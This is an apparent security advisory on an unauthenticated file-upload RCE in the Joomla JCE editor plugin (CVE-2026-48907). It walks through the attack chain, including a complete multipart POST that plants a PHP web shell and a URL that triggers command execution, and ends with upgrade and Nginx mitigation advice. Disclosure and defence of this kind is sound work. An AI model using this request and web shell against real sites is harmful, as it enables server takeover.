CVSS 10.0 Critical: Unauthenticated RCE in Joomla JCE Editor (CVE‑2026‑48907)

On June 13, 2026, security researcher ynsmroztas released JoomlaSniper and disclosed a CVSS 10.0 unauthenticated remote code execution vulnerability in the Joomla Content Editor (JCE) plugin (CVE‑2026‑48907). The vulnerability resides in the profiles.import endpoint, which accepts file uploads without authentication or validation, storing them as executable PHP files.

Affected versions: JCE 1.0.0 through 2.9.99.4. The only fix is JCE 2.9.99.5; no back‑ported patches exist for older releases.

Attack chain analysis

Step 1 – Detect JCE : Request /plugins/editors/jce/jce.xml or /administrator/components/com_jce/ and look for the “jce” or “joomlacontenteditor” strings in the response.

Step 2 – Extract CSRF token : Fetch the JCE homepage (e.g., /) and parse the HTML for a CSRF token using common patterns such as csrf_token" value="…".

Step 3 – Upload malicious file : Send a multipart POST to /index.php?option=com_jce with task=profiles.import, the extracted CSRF token, and a file named .xml.php containing a PHP web shell (e.g., <?php system($_GET['c']); ?>).

POST /index.php?option=com_jce HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=...

--boundary
Content-Disposition: form-data; name="task"

profiles.import
--boundary
Content-Disposition: form-data; name="{CSRF_TOKEN}"

1
--boundary
Content-Disposition: form-data; name="profile_file"; filename="shell.xml.php"
Content-Type: application/xml

<?php system($_GET['c']); ?>
--boundary--

Step 4 – Trigger RCE : Access the uploaded shell, e.g., https://target.com/tmp/shell.xml.php?c=whoami, to execute arbitrary commands on the server.

The JoomlaSniper tool automates this process, offering two upload vectors: the fast /tmp/ path and a fallback that writes to /images/ via a JCE browser RPC endpoint, achieving persistence even when /tmp/ execution is disabled.

#!/usr/bin/env python3
# JoomlaSniper – CVE-2026-48907
import sys, re, json, argparse, urllib.parse
from concurrent.futures import ThreadPoolExecutor, as_completed

# (Full script omitted for brevity; see original source for complete implementation.)

Mitigation

Immediate fix: upgrade JCE to version 2.9.99.5 or later. No patches exist for older versions, so upgrading is mandatory.

Temporary mitigation: block execution of PHP files in /tmp/ and /images/ at the web server level, e.g., with Nginx:

location ~* /tmp/.*\.php$ { deny all; }
location ~* /images/.*\.php$ { deny all; }

For detection, scan web access logs for anomalous POST requests to profiles.import and verify whether vulnerable JCE versions are present.